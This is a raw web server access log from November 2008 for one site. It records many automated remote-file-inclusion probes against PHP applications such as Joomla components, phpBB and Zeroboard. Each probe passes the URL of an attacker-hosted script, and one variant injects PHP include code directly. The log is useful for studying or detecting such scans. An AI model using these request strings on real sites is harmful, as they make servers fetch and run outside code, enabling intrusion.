70.85.192.194 - - [04/Nov/2008:11:19:01 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:11:19:15 -0800] "GET /logs/access_080927.log//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:19:18 -0800] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:19:19 -0800] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:19:19 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:19:20 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 95109 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:19:22 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:19:27 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:19:29 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:19:30 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 95125 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:20:04 -0800] "GET /logs/access_080925.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:20:09 -0800] "GET /logs/access_080925.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:11:20:25 -0800] "GET /logs/access_080925.log//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:20:33 -0800] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:20:34 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 95125 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:20:35 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:20:59 -0800] "GET /logs/access_080815.log/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:20:59 -0800] "GET /logs/access_080901.log/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:20:59 -0800] "GET /logs/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:21:24 -0800] "GET /logs/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:21:24 -0800] "GET /logs/access_080815.log%20%20/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:21:24 -0800] "GET /logs/access_080404.log%20%20/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:21:50 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:21:55 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:21:55 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:21:55 -0800] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:22:00 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:22:19 -0800] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:22:20 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:22:20 -0800] "GET /modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:22:24 -0800] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:11:22:28 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.251.154.174 - - [04/Nov/2008:11:22:40 -0800] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.251.154.174 - - [04/Nov/2008:11:22:40 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.251.154.174 - - [04/Nov/2008:11:22:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:22:51 -0800] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:23:02 -0800] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:23:02 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:02 -0800] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:02 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
213.251.154.174 - - [04/Nov/2008:11:23:05 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:08 -0800] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:23:09 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:23:09 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:23:12 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:15 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:23 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:23:23 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:28 -0800] "GET /logs/access_071214.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:30 -0800] "GET /?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94569 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:30 -0800] "GET /logs/access_071214.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:31 -0800] "GET /logs/access_071214.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:32 -0800] "GET /logs//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 72168 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:32 -0800] "GET /?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94585 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:33 -0800] "GET /logs/access_071214.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:33 -0800] "GET /?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94569 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:33 -0800] "GET /logs//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 72168 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:34 -0800] "GET /?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94569 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:34 -0800] "GET /logs//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 72168 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:23:35 -0800] "GET /logs//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 72168 "-" "libwww-perl/5.65" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:23:44 -0800] "GET /logs/access_080901.log/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:23:44 -0800] "GET /logs/access_080815.log/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.192.80 - - [04/Nov/2008:11:23:44 -0800] "GET /logs/index.php?redir=http://www.pianobarcafe.com/groups/orca/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.223.228.3 - - [04/Nov/2008:11:23:58 -0800] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:24:40 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:24:41 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:11:24:50 -0800] "GET /logs/access_080927.log//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:11:24:54 -0800] "GET /logs/access_080925.log//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.55.211.43 - - [04/Nov/2008:11:24:59 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:11:25:13 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:11:25:13 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:11:25:27 -0800] "GET /logs//index.php?skin_file=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:11:25:27 -0800] "GET /index.php?skin_file=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 200 94758 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:11:25:30 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:11:26:05 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:11:26:05 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:11:26:06 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:26:25 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:26:25 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:26:26 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:26:31 -0800] "GET /logs/access_080704.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:26:31 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:11:26:32 -0800] "GET /logs/access_080927.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.templonovo.com.br//modules/xt_conteudo/admin/CVS/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:26:37 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:11:26:41 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:26:54 -0800] "GET /logs/access_081018.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:26:57 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:26:57 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:11:28:02 -0800] "GET /logs/index2.php?x=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:11:28:02 -0800] "GET /index2.php?x=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:28:21 -0800] "GET /logs/access_081018.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:28:21 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:28:21 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:28:25 -0800] "GET /logs/access_080316.log//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:28:25 -0800] "GET /logs//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.103.17.21 - - [04/Nov/2008:11:28:26 -0800] "GET /index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 200 95266 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:28:48 -0800] "GET /logs/access_080331.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:28:48 -0800] "GET /logs/access_080331.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:28:52 -0800] "GET /logs/access_080331.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:29:00 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
118.45.190.166 - - [04/Nov/2008:11:29:04 -0800] "GET /logs/access_080331.log//?_zb_path=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.114.130 - - [04/Nov/2008:11:29:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
